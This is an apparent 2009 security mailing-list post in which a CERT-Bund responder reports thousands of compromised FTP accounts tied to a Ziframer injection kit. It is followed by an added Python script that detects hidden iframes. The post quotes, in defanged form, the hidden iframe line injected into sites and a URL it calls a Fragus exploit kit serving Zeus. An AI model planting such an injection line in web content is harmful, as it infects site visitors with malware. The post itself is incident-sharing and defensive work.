[nsp-sec] More compromised ftp accounts
Thomas Hungenberg
th.lab at hungenberg.net
Fri Sep 4 08:01:34 EDT 2009
Hi teams,
Roman from abuse.ch came across a new Ziframer installation (see <http://www.abuse.ch/?p=1739>).
It comes along with a list of 18245 ftp credentials.
Many of the accounts were already included with the list of accounts I posted here on 2009-08-25
(found along with another Iframer kit).
Please find attached a sanitized list (pw removed) of 8169 compromised ftp accounts that are new.
Format: ASN | IP | CC | ftp username | AS name
Top 10 country codes:
2699 US
705 DE
592 RU
482 TR
424 FR
331 PL
329 CZ
310 HU
298 NL
222 EU
The Iframer was configured to inject this line (remove 'XXX'):
<ifrXXXame src="htXXXtp://seca.ws/forum/show.php" width="1" height="1" style="display:none;"></ifrXXXame>
This URL leads to a Fragus exploit kit which currently drops a Zeus/Zbot trojan.
- Thomas
CERT-Bund Incident Response & Anti-Malware Team
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: ftp_asn_20090904.txt
URL: <https://puck.nether.net/mailman/private/nsp-security/attachments/20090904/b73655eb/attachment-0001.txt>
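
Added example, not part of the original post: a Python check that a site operator could run over web content uploaded through an affected FTP account to flag iframes with the properties of the injected line above (1x1 size, display:none). The function names and the sample page with its example.invalid hostnames are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Constructed sample page; hostnames are placeholders, not indicators from the post.
SAMPLE = """<html><body>
<h1>Welcome</h1>
<iframe src="http://video.example.invalid/embed/1" width="560" height="315"></iframe>
<iframe src="http://inject.example.invalid/show.php" width="1" height="1" style="display:none;"></iframe>
</body></html>
"""

def _pixels(value):
    """Return a width/height attribute as int, or None if absent or non-numeric."""
    m = re.fullmatch(r"\s*(\d+)\s*(?:px)?\s*", value or "", re.I)
    return int(m.group(1)) if m else None

class HiddenIframeFinder(HTMLParser):
    """Collects (line, src, reasons) for iframes a visitor would never see."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {name: (value or "") for name, value in attrs}
        reasons = []
        w, h = _pixels(a.get("width")), _pixels(a.get("height"))
        if w is not None and h is not None and w <= 1 and h <= 1:
            reasons.append("tiny")
        # Normalise case and whitespace so "Display : None" also matches.
        style = re.sub(r"\s+", "", a.get("style", "").lower())
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden-style")
        if reasons:
            self.hits.append((self.getpos()[0], a.get("src", ""), reasons))

def find_hidden_iframes(html):
    finder = HiddenIframeFinder()
    finder.feed(html)
    finder.close()
    return finder.hits

if __name__ == "__main__":
    for line, src, reasons in find_hidden_iframes(SAMPLE):
        print(f"line {line}: {src} ({', '.join(reasons)})")
```

A hit is a lead to review rather than proof of compromise, since some legitimate widgets also use hidden iframes.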